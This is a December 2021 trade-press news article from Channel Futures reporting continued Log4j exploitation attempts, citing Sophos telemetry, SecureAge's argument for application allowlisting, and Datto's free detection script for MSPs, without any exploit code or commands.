https://www.channelfutures.com/wp-content/themes/channelfutures_child/assets/images/logo/footer-new-logo.png
  • Home
  • Technologies
    • Back
    • SDN/SD-WAN
    • Cloud
    • RMM/PSA
    • Security
    • Telephony/UC/Collaboration
    • Cable
    • Mobility & Wireless
    • Fiber/Ethernet
    • Data Centers
    • Backup & Disaster Recovery
    • IoT
    • Desktop
    • Artificial Intelligence
    • Analytics
  • Strategy
    • Back
    • Mergers and Acquisitions
    • Channel Research
    • Business Models
    • Distribution
    • Technology Solutions Brokerages
    • Sales & Marketing
    • Best Practices
    • Vertical Markets
    • Regulation & Compliance
  • MSP 501
    • Back
    • 2022 MSP 501 Rankings
    • 2022 NextGen 101 Rankings
  • Intelligence
    • Back
    • Galleries
    • Podcasts
    • From the Industry
    • Reports/Digital Issues
    • Webinars
    • White Papers
  • Channel Futures TV
  • EMEA
  • Channel Chatter
    • Back
    • People on the Move
    • New/Changing Channel Programs
    • New Products & Services
    • Industry Honors
  • Resources
    • Back
    • Advisory Boards
    • Industry Organizations
    • Our Sponsors
    • Advertise
    • 2023 Editorial Calendar
  • Awards
    • Back
    • 2022 MSP 501
    • Channel Influencers
    • Circle of Excellence
    • DE&I 101
    • Technology Advisor 101 (TA 101)
  • Events
    • Back
    • 2023 Call for Speakers
    • CP Conference & Expo
    • MSP Summit
    • Channel Partners Europe
    • Channel Partners Event Coverage
    • Webinars
    • Industry Events
  • About Us
  • DE&I
Channel Futures
  • NEWSLETTER
  • Home
  • Technologies
    • Back
    • SDN/SD-WAN
    • Cloud
    • RMM/PSA
    • Security
    • Telephony/UC/Collaboration
    • Cable
    • Mobility & Wireless
    • Fiber/Ethernet
    • Data Centers
    • Backup & Disaster Recovery
    • IoT
    • Desktop
    • Artificial Intelligence
    • Analytics
  • Strategy
    • Back
    • Mergers and Acquisitions
    • Channel Research
    • Business Models
    • Distribution
    • Technology Solutions Brokerages
    • Sales & Marketing
    • Best Practices
    • Vertical Markets
    • Regulation & Compliance
  • MSP 501
    • Back
    • 2022 MSP 501 Rankings
    • 2022 NextGen 101 Rankings
  • Intelligence
    • Back
    • Galleries
    • Podcasts
    • From the Industry
    • Reports/Digital Issues
    • Webinars
    • White Papers
  • Channel Futures TV
  • EMEA
  • Channel Chatter
    • Back
    • People on the Move
    • New/Changing Channel Programs
    • New Products & Services
    • Industry Honors
  • Resources
    • Back
    • Advisory Boards
    • Industry Organizations
    • Our Sponsors
    • Advertise
    • 2023 Editorial Calendar
  • Awards
    • Back
    • 2022 MSP 501
    • Channel Influencers
    • Circle of Excellence
    • DE&I 101
    • Technology Advisor 101 (TA 101)
  • Events
    • Back
    • 2023 Call for Speakers
    • CP Conference & Expo
    • MSP Summit
    • Channel Partners Europe
    • Channel Partners Event Coverage
    • Webinars
    • Industry Events
  • About Us
  • DE&I
    • Newsletter
  • REGISTER
  • MSPs
  • VARs / SIs
  • Agents
  • Cloud Service Providers
  • Channel Partners Events
 Channel Futures

MSSP Insider


Shutterstock

Evil Santa Hacker

As Holidays Approach, Log4j Vulnerability Exploitations Continue Unabated

  • Written by Edward Gately
  • December 21, 2021
Datto has released a tool for MSPs to combat the log4j vulnerability.

As the holidays swiftly approach, cybercriminals remain actively exploiting the log4j vulnerability with distributed scans and attacks globally.

That’s according to Sophos. It released its latest log4j research on Tuesday.

Sean Gallagher is senior threat researcher at Sophos.

Sophos' Sean Gallagher

Sophos’ Sean Gallagher

“Sophos continues to monitor scans for log4j vulnerabilities,” he said. “In the past with vulnerability scans and exploit attempts, we’ve seen big spikes and then significant dropoffs.”

In the case of log4j, Sophos hasn’t seen any drop-offs, Gallagher said. Instead, there’s scans and exploit attempts from a globally distributed infrastructure on a daily basis.

Sophos expects this high degree of activity to continue, he said. That’s due to the multi-faceted nature of the vulnerability and the large extend of patching required.

On Dec. 10, researchers discovered a zero-day exploit in the popular Java logging library log4j. It results in remote code execution (RCE) by logging a certain string. Since then, additional vectors have been discovered.

Log4J Vulnerability Prompts Malicious Activity

“As indicated, in some cases, a request comes from an IP address in one geographic region, with embedded URLs for log4j that connect to servers elsewhere — sometimes multiple different servers,” Gallagher said. “And while some of this is benign testing or research by penetration testers and other security researchers, a larger portion is malicious.”

For example, Sophos telemetry shows 59% of the exploit attempts try to make log4j contact with internet addresses in India. More than 40% of the exploit attempts try to make log4j contact with internet addresses in the United States.

However, the exploit attempts themselves predominantly originate from China and Russia. And most are tied to cybercrime.

“One server in Russia, connected to the Kinsing cryptocoin-mining botnet, is responsible for more than 10% of the exploit attempts Sophos has seen – more than 33% of the traffic from that country,” Gallagher said.

A Pathway for Malware

Nigel Thorpe is technical director at SecureAge. He said the log4j vulnerability illustrates why organizations can’t just rely on cybersecurity training and tools that look for code, patterns and behavior that’s already known as malicious.

SecureAge's Nigel Thorpe

SecureAge’s Nigel Thorpe

“After all, until recently everyone thought that log4j was just a neat way for services to log their actions,” he said. “Now we know that unpatched, log4j provides a way for cybercriminals to get their malware into systems.”

All the affected services run on servers that are tightly controlled, Thorpe said.

“Sure, their customers probably click on malicious links on a regular basis, but the servers themselves should be tightly wrapped up,” he said. “So why continue to try and identify the potentially infinite universe of malware when we know precisely what is authorized to run on these servers? Why not simply allow all the known, approved processes to execute, and block everything else?”

All malware has to execute so that it can achieve its aims, Thorpe said. That includes data theft, opening a backdoor or scrambling all data.

“And we know that all malware should be blocked,” he said. “So let’s put some simple, pragmatic controls in place. It’s like a bouncer at a club. You’re not on the list so you’re not coming in.”

Datto Helps MSPs Protect Themselves From Log4J Exploits

Datto is encouraging all MSPs to download a free script it has developed and made available on GitHub for any remote monitoring and management (RMM) solution. This endpoint assessment tool can enumerate potentially vulnerable systems, detect intrusion attempts, and inoculate Windows systems against log4j vulnerability attacks.

Within 24-48 hours following the disclosure of the log4j vulnerability, Datto first declared its products safe for use. Datto began sharing active threat intelligence with the MSP community about attacks it observed to help MSPs understand the log4j threat and how it was being exploited.

The adoption of the component created for Datto RMM has been utilized by almost 50% of all Datto RMM partners. That represents millions of scans of endpoints by MSPs for vulnerabilities at client-sites that are SMBs.

Still Early Days With Log4J Vulnerability

Ryan Weeks is Datto’s CISO.

Datto's Ryan Weeks

Datto’s Ryan Weeks

“It’s still early days with this threat,” he said. “There are no currently widely known cases of MSPs suffering attacks due to log4shell exploits on the log4j vulnerabilities. We know from threat intelligence sources and reporting that initial access brokers started to scan for vulnerable instances within the first 48-72 hours of the exploit being known. We also know that ransomware operators are operationalizing the exploit in their kits. I expect that we’ll start to see more ransomware attacks in the coming weeks and months that can be traced back to initial access via log4j exploit.”

There’s still ample time for MSPs to protect themselves, Weeks said.

“An exploited server at this stage can still be identified and responded to in a way that minimizes damage,” he said. “Assuming breach and building cyber resilience means we knew this day would come and we’ve built capabilities to respond to it. If there is a threat present on a vulnerable system, you can still evict them, recover the systems and prevent a worse outcome like full scale ransomware.”

MSPs should implement outbound network egress restrictions, Weeks said. That should both kill the attack chain for log4shell and disrupt potential command and control communications (C2).

Want to contact the author directly about this story? Have ideas for a follow-up article? Email Edward Gately or connect with him on LinkedIn.
Tags: MSPs Best Practices Channel Chatter Channel Research Cloud EMEA MSSP Insider New Products & Services Security

Most Recent


  • the software patching problem - solved
    The Software Patching Problem - Solved
    Organizations are struggling to keep up with the pace of software security patches and updates, making automation essential.
  • Making Waves
    7 Channel People Making Waves This Week at Pax8, Canalys, Microsoft, Splunk, More
    Over 100,000 unfilled jobs for IT professionals have been eliminated.
  • Public Cloud Spending Is Slowing: AWS, Google Cloud Sales Down (Not Out)
    The numbers mesh closely with Microsoft’s Intelligent Cloud results, indicating industry-wide pullbacks.
  • Collin Ellis at Zero Trust World 2023
    Zero Trust World 2023: A Deep Dive Into the Dark Web, ThreatLocker Gold Partner Awards
    Cybercriminals will steal data just to prove someone has bad security.

Leave a comment Cancel reply

-or-

Log in with your Channel Futures account

Alternatively, post a comment by completing the form below:

Your email address will not be published. Required fields are marked *

Related Content

  • no passwords
    Beyond Identity Urges Channel to Capitalize on Demand for Passwordless
  • Skull with code background
    Alternative Attack Vector Discovered for Log4J Vulnerability
  • Vulnerability
    Nation-States Pounce on Easy-to-Exploit Log4Shell Software Vulnerability
  • Security Vulnerability
    Log4Shell Vulnerability To Have Massive Impact Into 2022 And Beyond

Upcoming Events

View all

Channel Partners Conference & Expo

May 1, 2023 - May 4, 2023

Channel Partners Europe

June 13, 2023 - June 14, 2023

Channel Futures Leadership Summit

October 30, 2023 - November 2, 2023

Galleries

View all

7 Channel People Making Waves This Week at Pax8, Canalys, Microsoft, Splunk, More

February 3, 2023

Post-TBI Acquisition, Partners Weigh the Future of AppDirect, TSDs

February 3, 2023

Juniper Networks Shows ‘Swagger’ with Ambitious Growth Strategy

February 3, 2023

Industry Perspectives

View all

The Software Patching Problem – Solved

February 3, 2023

How to Break Through the Growth Ceiling

February 1, 2023

5 Things to Look for in a UC Partner

January 31, 2023

Webinars

View all

Next-Generation MSP Platform: The Building Blocks for Your Business

February 15, 2023

How To Boost Your Business With White-Label UCaaS

February 28, 2023

Security Secrets of the MSP 501: How to Be a Cyber Leader in 2023

December 15, 2022
  • 1

White Papers

View all

6 UCaaS Reseller Challenges and How Real World Businesses Solved Them

February 1, 2023

Frost Radar: North American UCaaS Market, 2022

February 1, 2023

The Complete Guide to White-Label UCaaS for Reseller Success

February 1, 2023

Channel Futures TV

View all

Coffee with Craig and James Episode 117: Cato Networks, Video Killed the Podcast Stars

Retired Astronaut Capt. Scott Kelly Previews His CP Expo Keynote

December 21, 2022

Fusion Connect Eyes Future with Intrado UC, Managed Network Customers

September 23, 2022

RingCentral Focused on Hybrid Work, Microsoft Teams, Other Integrations

September 23, 2022

Twitter

ChannelFutures

Channel people making waves include: @RobTRae, @vasujakkal, @ReneeIMCloud, @garylsteele dlvr.it/ShvjQ3 https://t.co/yz09flzXvV

February 3, 2023
ChannelFutures

The slowdown in #publiccloud spending is real and it’s arrived at #AWSCloud and #GoogleCloud.… twitter.com/i/web/status/1…

February 3, 2023
ChannelFutures

#ZTW23: @ThreatLocker Gold Partners announced, deep dive into the dark web. dlvr.it/ShvFGF https://t.co/k68BfzLToq

February 3, 2023
ChannelFutures

Channel Partner Success Story: Forerunner Technologies - Learn how @NEC UNIVERGE BLUE Cloud Solutions enabled… twitter.com/i/web/status/1…

February 3, 2023
ChannelFutures

Partners and suppliers weighed in on the AppDirect-TBI acquisition and its implications for the channel.… twitter.com/i/web/status/1…

February 3, 2023
ChannelFutures

Read about @coxbusiness' acquisition of @Logicworks. dlvr.it/Shty4t https://t.co/3MaKai6SVr

February 3, 2023
ChannelFutures

Where in the world are the top MSPs?? Take a look at the infographic breakdown of 2022 #MSP501 winners by region >>… twitter.com/i/web/status/1…

February 3, 2023
ChannelFutures

.@SovosCompliance offers tips for how and when to revamp #partnerplans. dlvr.it/ShtDgv https://t.co/vPzajXnjee

February 3, 2023

MSP 501

The industry's largest and most comprehensive partner awards program.

Newsletters and Updates

Sign up for The Channel Report, Channel Futures Update, MSP 501 Newsletter and more.

Live Channel Events

Get the latest information on the next industry-leading Channel Partners event.

Galleries

Educational slide shows and images from live events.

Media Kit And Advertising

Want to reach our audience? Access our media kit.

DISCOVER MORE FROM INFORMA TECH

  • Channel Partners Events
  • Telecoms.com
  • MSP 501
  • Black Hat
  • IoT World Today
  • Omdia

WORKING WITH US

  • Contact
  • About Us
  • Advertise
  • Newsletter

FOLLOW Channel Futures ON SOCIAL

  • Privacy
  • CCPA: “Do Not Sell My Data”
  • Cookie Policy
  • Terms
Copyright © 2023 Informa PLC. Informa PLC is registered in England and Wales with company number 8860726 whose registered and Head office is 5 Howick Place, London, SW1P 1WG.
This website uses cookies, including third party ones, to allow for analysis of how people use our website in order to improve your experience and our services. By continuing to use our website, you agree to the use of such cookies. Click here for more information on our Cookie Policy and Privacy Policy.
X